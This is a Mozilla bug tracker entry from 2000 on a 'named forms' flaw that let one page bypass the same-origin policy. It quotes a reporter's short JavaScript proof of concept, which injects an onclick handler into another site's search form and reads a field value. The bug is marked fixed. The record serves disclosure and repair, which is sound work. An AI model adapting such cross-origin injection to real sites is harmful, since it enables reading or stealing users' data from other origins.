Closed
Bug 29712
Opened 25 years ago
Closed 24 years ago
Named forms vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M15
People
(Reporter: norrisboyd, Assigned: norrisboyd)
References
()
Details
(Whiteboard: fix in hand)
Subject: BUG: Named forms vulnerability Date: Tue, 29 Feb 2000 14:33:28 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> Named forms are not protected by Same Origin security policy and allow accessing the DOM of target documents. The code is: --------------------------------------------------------- <SCRIPT> a=window.open("http://search.netscape.com","victim"); function f() { a.document.searchform.setAttribute("onclick","alert('value='+document.forms[0].e lements[1].value)"); } setTimeout("f()",10000); </SCRIPT> ---------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M15
Assignee | ||
Comment 1•25 years ago
|
||
May need to use the special /* ... */ as in /dom/public/idl/html/HTMLFormElement.idl, line 23 -- jsval namedItem(/* ... */);
Assignee | ||
Updated•25 years ago
|
Whiteboard: fix in hand
Assignee | ||
Comment 3•24 years ago
|
||
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
You need to log in
before you can comment on or make changes to this bug.
Description
•